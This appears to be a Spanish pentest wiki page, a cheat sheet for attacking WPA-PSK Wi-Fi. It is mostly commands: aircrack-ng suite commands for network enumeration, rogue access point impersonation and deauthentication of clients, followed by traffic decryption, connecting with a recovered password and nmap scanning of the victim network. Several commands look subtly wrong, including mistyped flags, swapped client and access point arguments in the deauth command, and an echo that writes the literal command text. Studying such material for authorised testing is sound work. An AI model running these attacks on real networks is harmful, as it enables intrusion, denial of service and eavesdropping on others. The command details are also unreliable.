Comment on page

Redes PSK

Redes WPA-TKIP o WPA-CCMP
​

1. Enumeración

Teniendo en cuenta que la tarjeta de red está en modo MONITOR

  • Para enumerar todas las redes a tu alrededor
airodump-ng -band abg [wlan0mon]
  • Para limitar la enumeración a un ESSID y guardar el resultado
airodump-ng -band abg [wlan0mon] --esid [ESSID] -w outputFile
  • Para limitar la enumeración a varios ESSIDs y guardar el resultado
airodump-ng --band abg [wlan0mon] --essid-regex 'ESSID1|ESSID2|ESSID3' -w outputFile
  • Para enumerar las redes de canales determinados
airodump-ng -band abg -c [44,60,11] [wlan0mon]
  • Para enumerar los fabricantes de los puntos de acceso
airodump-ng -band abg [wlan0mon] --manufacturer

Teniendo en cuenta que la tarjeta de red está en modo MANAGE

  • Para ver los APs disponibles en el entorno
iwlist [wlan0] scan | grep [ESSID] -i
​

2. Habilitar Rogue APs de una red

Para suplantar la red necesitamos 2 terminales:
Terminal 1 -> Escanea los AP cercanos con el BSSID a suplantar
airodump-ng --band abg [wlan0mon] --essid [ESSID]
Terminal 2 -> Levanta un AP con el nombre de la red (BSSID) a suplantar con nuestra MAC
airbase-ng -e [ESSID] -v [wlan0mon]
​

3. Des-autenticar clientes conectados a una red

  • Escaneo de las redes
airodump-ng -c [canal] --essid [ESSID] [wlan0mon]
  • Desautenticación de un cliente de la red
aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] -a [MACDelClienteADesautenticar] [wlan0mon]
  • Desautenticación de todos los cliente de la red
aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] [wlan0mon]
​

4. Descifrar tráfico capturado de una red

airdecap-ng [fichero.cap] -p [password] -e [ESSID]
​

5. Conexión a la red

Una vez tenemos la contraseña de la red, para autenticarnos podemos generar el fichero "wpa_supplicant_ESSID.conf"
En este fichero necesitamos el hash PSK, que lo generamos con wpa_passphrase
echo "wpa_passphrase [ESSID] [password]" > wpa_supplicant_ESSID.conf
Y obtendremos algo como:
network={
ssid="MYSSID"
#psk="passphrase"
psk=4930a14b99a5884d2bbfa0fe7c3210bf6da8eb5788a0ec69a7507c5f0328a096
}
Con este resultado podremos conectarnos a la red (con la interfaz en modo managed)
wpa_supplicant -c [wpa_supplicant_ESSID.conf] -i [wlan1]
Una vez lanzado este comando, debemos leer los EVENT-SCAN-RESULTS para analizar los posibles fallos en la conexión (CTRL-EVENT-SCAN-FAILED).
Cuanto veamos EVENT-SCAN-CONNECTED habremos conseguido conectarnos a la red.
Una vez conectados debemos solicitar una dirección IP al DHCP.
dhclient [wlan1] -v
​

6. Recursos accesibles

Cuando tenemos asignada una dirección IP en la red podemos saber el rango que tiene la red, lo que nos permite escanearla en busca de dispositivos conectados.
nmap -Pn IP/rango
En los resultados que obtengamos podemos realizar nmaps que nos den más detalles de los servicios expuestos.
​

Recursos y enlaces de referencia

​
Last modified 26d ago